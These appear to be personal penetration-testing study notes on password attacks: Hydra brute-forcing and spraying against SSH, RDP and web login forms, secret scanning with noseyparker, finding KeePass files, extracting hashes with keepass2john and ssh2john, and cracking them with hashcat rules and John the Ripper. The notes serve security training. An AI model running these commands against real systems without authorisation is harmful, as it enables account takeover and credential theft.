Password Attacks

Hydra

• Can be used on a lot of things
• SSH:
  • sudo hydra -l {username} -P {password_list} -s {port} ssh://{IP}
  • Lets say we found a password, and want to spray it everywhere (like rdp)
    • sudo hydra -L {username_list} -p {password} rdp://{IP}
• HTTP:
  • Provide a username, password list, IP, endpoint to post to, ^PASS^ for the password used, and a string in the HTTP of the failed result
  • sudo hydra -l {username} -P {password_list} {IP} http-post-form "/{endpoint}:{param1}=^PASS^:Login failed. Invalid"
    • So, for example: sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:user=admin&password=^PASS^:Login failed. Invalid"
  • Could also likely just use ffuf (with a filter on size if app returns 200)

Passwords

• AES is symmetric, RSA is asymmetric
• GPUs crack like a thousand times faster than CPUs

Finding Passwords

• Just use noseyparker. Can scan file systems, cloned repositories, and even entire github organizations.
  • noseyparker scan {repo/directory}
  • noseyparker scan --github-org={org}
  • Show results with noseyparker report
• Make sure to save or delete the existing datastore.np before starting a new scan

Password Cracking

• Example hashes for each hashcat mode: https://hashcat.net/wiki/doku.php?id=example_hashes
• Mutating Wordlists:
  • https://github.com/frizb/Hashcat-Cheatsheet?tab=readme-ov-file
  • Sometimes wordlists might not match the minimum requirements of a password for a location being tested, so the wordlist can drop all of the unneeded passwords
  • hashcat -r "$1 c $!" {password_list} will capitalize the first letter of each password, append “1” to the end of each password, and then append “!” to the end of that password
    • Putting these rules into a file with newlines will create a new password for each newline, adding that lines modifications to that password
    • Hashcat provides some rules in /usr/share/hashcat/rules/, like rockyou-30000
      • They always seem to use best64.rule
  • These modifications can be stored in files and used when cracking–for example:
    • hashcat -m 0 {hash} {password_list} -r {modification_file} --force
• Ensure to find the type of hash before cracking to save time
• Extracting hashes:
  • Many methods, but here’s a novel one:
    • Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue will search for kdbx files (KeePass files) containing hashes
    • keepass2john {keepass_database_file} to extract hash
• Determining hash type:
  • hashcat --help will list a lot of info about types of hashes, so if we know where the hash is from, we can look it up here with hashcat --help | grep -i "{identifier}
    • This should return the hashcat mode for the hash, which is a number like 13400
• Cracking the hash:
  • hashcat -m {hashcat_mode (e.g. 13400)} {hash} {wordlist} -r {mutation} --force
    • Increase speed with -O -w 4 --opencl-device-types 1,2

SSH Private Key Passphrase

• ssh2john {private RSA SSH key file} > ssh.hash will put the hash in a crack-able format
• hashcat -m 22921 ssh.hash {password_list} -r {mutation} --force will crack the SSH hash
  • 22921 comes from looking up $6$ in the hashcat --help response
  • However, this might result in an error due to this cipher not being supported by hashcat
• John the Ripper
  • Can handle the error above
  • Can use mutation rules, placed at the end of /etc/john/john.conf
  • john --wordlist={password_list} --rules=sshRules {hash} to crack